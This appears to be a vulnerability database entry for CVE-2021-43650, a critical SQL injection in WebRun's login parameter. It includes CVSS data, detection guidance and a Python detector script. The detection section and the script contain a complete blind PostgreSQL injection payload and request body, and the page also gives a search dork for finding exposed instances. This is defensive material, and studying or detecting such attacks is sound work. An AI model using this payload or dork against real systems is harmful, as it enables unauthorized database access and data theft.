CVE-2021-43650
Published 2022-03-22
CVE-2021-43650: WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.
Priority P264 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 6.16% (92.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softwell | webrun | — | — |
Detection & IOCs
- other: `P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd`
- command: `action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd`

- Monitor POST requests to the login endpoint for SQL injection patterns in the P_0 parameter, specifically CAST/CHR-based blind SQLi payloads targeting a PostgreSQL backend.
- Alert on POST body containing 'action=executeRule' combined with 'ruleName=GES_FLX_Gerar+Token+Dashboard' and SQL metacharacters in P_0, as this is the specific rule endpoint abused during exploitation.
- Detect the canary string 'qvvxq1qbzbq' in HTTP responses, which confirms successful exploitation of the PostgreSQL CAST-based error injection.
- Use the Google Dork 'intitle:"Webrun 3.6.0.42"' to identify exposed vulnerable instances for asset inventory and attack surface reduction.
- The vulnerable parameter P_0 is submitted via POST body (not URL query string); network inspection rules must inspect POST body content to detect this attack.
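
The request and response checks listed above, sketched as an added example that is not from the vendor or from the sources this page indexes. The function names, reason labels, benign login body and response line are constructed for illustration; the flagged request body is the one quoted on this page.

```python
import re
from urllib.parse import parse_qs

# Constructs visible in the payload quoted on this page, matched after URL-decoding.
# A bare quote also matches, so names like O'Brien will need triage or an allowlist.
SQL_META = re.compile(r"'|\|\||--|/\*|\b(?:CAST|CHR|SELECT|UNION|CASE\s+WHEN)\b", re.I)
CAST_CHR = re.compile(r"\bCAST\s*\(.*\bCHR\s*\(", re.I | re.S)
RULE_NAME = "GES_FLX_Gerar Token Dashboard"   # '+' in the body decodes to a space
CANARY = "qvvxq1qbzbq"                        # canary string given on this page

def inspect_request(method, body):
    """Return the detection reasons for one HTTP request (empty list if clean)."""
    if method.upper() != "POST":              # P_0 travels in the POST body
        return []
    params = parse_qs(body, keep_blank_values=True)
    reasons = []
    for value in params.get("P_0", []):
        if SQL_META.search(value):
            reasons.append("sql-metacharacters-in-P_0")
        if CAST_CHR.search(value):
            reasons.append("cast-chr-error-injection")
    if reasons and params.get("action") == ["executeRule"] \
            and params.get("ruleName") == [RULE_NAME]:
        reasons.append("executeRule-token-dashboard")
    return reasons

def response_has_canary(body):
    """True when a response body echoes the canary string."""
    return CANARY in body

# Request body as quoted on this page.
EXPLOIT_BODY = (
    "action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES"
    "&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)"
    "||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext"
    "||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd"
)
# Constructed samples: an ordinary login and a PostgreSQL-style error response.
BENIGN_BODY = ("action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard"
               "&sys=GES&formID=8265&parentRID=-1&P_0=alice&P_1=pwd")
ERROR_RESPONSE = 'ERROR: invalid input syntax for type numeric: "qvvxq1qbzbq"'

if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("benign", BENIGN_BODY)):
        print(name, inspect_request("POST", body))
    print("canary in response:", response_has_canary(ERROR_RESPONSE))
```
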
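CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |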
No detection rules found.
No writeups or analysis indexed.